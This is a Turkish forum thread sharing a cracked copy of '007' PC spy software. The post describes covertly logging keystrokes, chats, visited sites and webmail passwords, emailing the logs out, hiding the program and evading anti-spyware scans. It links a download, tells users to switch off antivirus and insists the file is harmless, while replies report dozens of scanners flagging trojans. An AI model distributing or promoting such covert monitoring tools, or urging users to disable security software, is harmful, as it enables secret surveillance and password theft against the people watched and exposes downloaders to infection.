Casus 007 | v3.92 | Full

Darknes92

New member
Reaction score
0
lk-main-s.jpg

007 Pc Takip Yazılımı Bilgisayar Takip Yazılımları Arasında En Çok İşlevselliği Olan Programdır.
Kolay Kullanabilirliğin Yanı Sıra Fiyatı Açısından Dünyanın En Çok Tercih Edilen Casus Bilgisayar Yazılımıdır.

007 Pc Takip Yazılımı Başlıca Özellikleri Ziyaret Edilen Web Siteleri, Klavyeden Basılan Her Tuş, (icq msn aol aim irc) Gibi Canlı Sohbet Ortamları Dahil Olmak Üzere Ayrıca Hotmail Yahoo Mail Gibi Mail Hesaplarının Şifresini Gizlice Kaydedip Size Bildirmektedir.

Kısacası Bilgisayarda Yapılan Her İşlem Eksiksiz Olarak Kayıt Altına Alınıp Size Bildirilir

Açıklama:
ADVANCED OPTION: Buradan gelişmiş seçeneklere girebilirsiniz ve tüm kayıtların gönderileceği e-mail adresini belirleyebilirsiniz.
APPLICATIONS LOG: Bu menüde uygulamaların listelerini görebilirsiniz
CANCEL: Menüde belirlediğiniz işlemleri iptal eder.
CLEAR LOGS: Kaydettiği her şeyi siler.
FILE/FOLDERS LOG: Bu menüde açılan, çalıştırılan ve silinen dosyaları görebilirsiniz
HIDE: Programı gizler.
HOTKEY SELECTION: Programa erişmek için ve görüntülemek için kısa yolu belirleyin
KEYSTROKES LOG: Klavyeden doğru girilen tüm verileri kaydeder. Bu menüden doğru girilen yazışmaları, şifreleri ve mailleri görebilirsiniz.
OK: Yaptığınız işlemleri bu butona basarak kaydedebilirsiniz
OVERRIDE ANTISPY PROGRAMS: Bu seçenekle antispy taramaları atlatılabilir ve bu programın anti-virüsler tarafından tanınmasını engelleyebilirsiniz. (Bu özellikten tamamı ile yararlanabilmek için lisans gereklidir)
PASSWORD SETUP: Programa erişmek için şifrenizi belirleyin.
SCREENSHOTS LOG: Bunu tıklayarak ekran görüntüsü elde edebilirsiniz.
START UP OPTION: Başlatma menüsüdür.
STEALTH MODE: Gizlilik durumudur. Programın fark edilmemesi için bu ayarda tutun yazılımınızı.
STOP: Programı durdurur.
UNINSTALL 007 SPY SOFTWARE: Programı bilgisayardan siler.
WEBSİTES LOG: Gezilen web sitelerinin listesini gösterir

Not:partın içine Extradan güvenlik yazılmı ekledim oda full....:)

Anti virüs programı kapatarak yükleme yapınız...Her hangi bir virüs değildir.

Link:
Kod:
http://hotfile.com/dl/108346295/8dbb6cd/Casus_007_klosek.zip.html

Not:Daha önceden böyle bir konu açmıştım ve neticede arama motorlarında ulaşamadım.Nu konuda Mod ile eletişim kurdum vakat geri dönüş olmadı ondan dolayı tekrar paylaşıyorum....

Madem virüs degil neden Antivürüsü kapatın diyosunn????
Arkadaslar indirdim Total virüse gönderdim , 43 degişik Antivirüs taradı ve 27 Trojan ,Malware, Spyware verdi. Avastta taratım oda svchost.exe virüsü buldu bilginize ..

Arkadaslar indirdim Total virüse gönderdim , 43 degişik Antivirüs taradı ve 27 Trojan ,Malware, Spyware verdi. Avastta taratım oda svchost.exe virüsü buldu bilginize ..

Dostum o nesneler olmadan nası bilgi sızdırma sağlancak soruyorum sana....:hhmencool:

bu tarz programlar,zaten virüs diye tanımlanır alttan sisteme iletişim kurar mail at komutu vermişsen alttan neti kullanır. virüs programını kapatmadan kurmaya kalktıgında programın bir eklentisini engeller ve verim alamazsın .ben bu programı dealarca kullandım. sorun yok.

Bu Programlar Trojan İçeriklidir Ve Bu trojanlar virus deildir. Trojanlar her Virüs Programını Tehdit Eder Çünkü Trojanlar pc de gizli birşeyler kullanmaya çalışır kısacası Trojanların Yaptıgı şey saman altından su yürükmek gibi birşeydir... ( anlatamadıysam sole) :thumbup:

Geri